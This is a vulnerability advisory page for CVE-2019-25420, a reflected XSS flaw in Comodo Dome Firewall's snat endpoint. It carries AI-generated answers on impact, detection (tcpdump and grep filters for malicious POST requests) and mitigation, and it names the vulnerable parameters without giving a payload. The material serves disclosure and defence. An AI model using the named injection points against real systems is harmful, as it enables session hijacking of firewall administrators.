CVE-2019-25420
Reflected XSS in Comodo Dome Firewall 2.7.0 via snat Endpoint
Publication date: 2026-02-19
Last updated on: 2026-02-20
Assigner: VulnCheck
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| comodo | dome_firewall | to 2.7.0 (inc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-79 | The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
[{'type': 'paragraph', 'content': 'CVE-2019-25420 is a reflected cross-site scripting (XSS) vulnerability found in Comodo Dome Firewall version 2.7.0 and earlier.'}, {'type': 'paragraph', 'content': 'This vulnerability occurs because the firewall improperly neutralizes input during web page generation, allowing attackers to inject malicious JavaScript code.'}, {'type': 'paragraph', 'content': "Attackers exploit this by sending crafted POST requests to the 'snat' endpoint, specifically injecting scripts via the 'port' or 'snat_to_ip' parameters."}, {'type': 'paragraph', 'content': 'When a user accesses the affected endpoint, the malicious scripts execute in their browser, potentially compromising their session or data.'}] [1]
How can this vulnerability impact me? :
This vulnerability allows attackers to execute arbitrary scripts in the browsers of users who visit the affected endpoint.
Such script execution can lead to theft of sensitive information, session hijacking, or other malicious actions performed on behalf of the user.
Because the attack requires user interaction (the user must access the vulnerable endpoint), it can be used in targeted phishing or social engineering attacks.
Overall, it poses a medium severity risk that can compromise user security and trust in the affected system.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
I don't know
How can this vulnerability be detected on my network or system? Can you suggest some commands?
[{'type': 'paragraph', 'content': 'This vulnerability can be detected by monitoring for suspicious POST requests sent to the "snat" endpoint of the Comodo Dome Firewall web interface. Specifically, crafted POST requests containing JavaScript payloads in the "port" or "snat_to_ip" parameters indicate potential exploitation attempts.'}, {'type': 'paragraph', 'content': 'To detect such activity, you can use network monitoring tools or web server logs to filter POST requests targeting the snat endpoint and inspect the parameters for suspicious script content.'}, {'type': 'paragraph', 'content': 'Example commands to detect such attempts might include:'}, {'type': 'list_item', 'content': "Using tcpdump to capture POST requests to the snat endpoint: tcpdump -A -s 0 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' | grep 'POST /snat'"}, {'type': 'list_item', 'content': "Using grep on web server logs to find suspicious POST requests: grep 'POST /snat' /var/log/httpd/access_log | grep -iE 'port=|snat_to_ip='"}, {'type': 'list_item', 'content': 'Using a web vulnerability scanner or proxy tool (like Burp Suite) to send crafted POST requests with JavaScript payloads to test if the endpoint reflects the input.'}] [1]
What immediate steps should I take to mitigate this vulnerability?
[{'type': 'paragraph', 'content': 'Immediate mitigation steps include implementing proper input validation and sanitization on the snat endpoint to neutralize any malicious scripts in the "port" and "snat_to_ip" parameters.'}, {'type': 'paragraph', 'content': 'Additionally, restricting access to the Comodo Dome Firewall web interface to trusted users and networks can reduce the risk of exploitation.'}, {'type': 'paragraph', 'content': 'Applying any available patches or updates from Comodo that address this vulnerability is strongly recommended.'}, {'type': 'paragraph', 'content': 'As a temporary workaround, monitoring and blocking suspicious POST requests targeting the snat endpoint can help mitigate exploitation attempts.'}] [1]